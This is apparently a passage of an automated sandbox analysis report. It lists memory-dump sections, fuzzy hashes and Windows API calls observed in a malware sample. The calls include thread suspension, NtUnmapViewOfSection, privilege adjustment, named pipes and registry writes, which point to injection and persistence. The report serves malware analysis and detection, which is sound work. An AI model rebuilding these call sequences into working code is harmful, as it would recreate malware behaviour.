    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
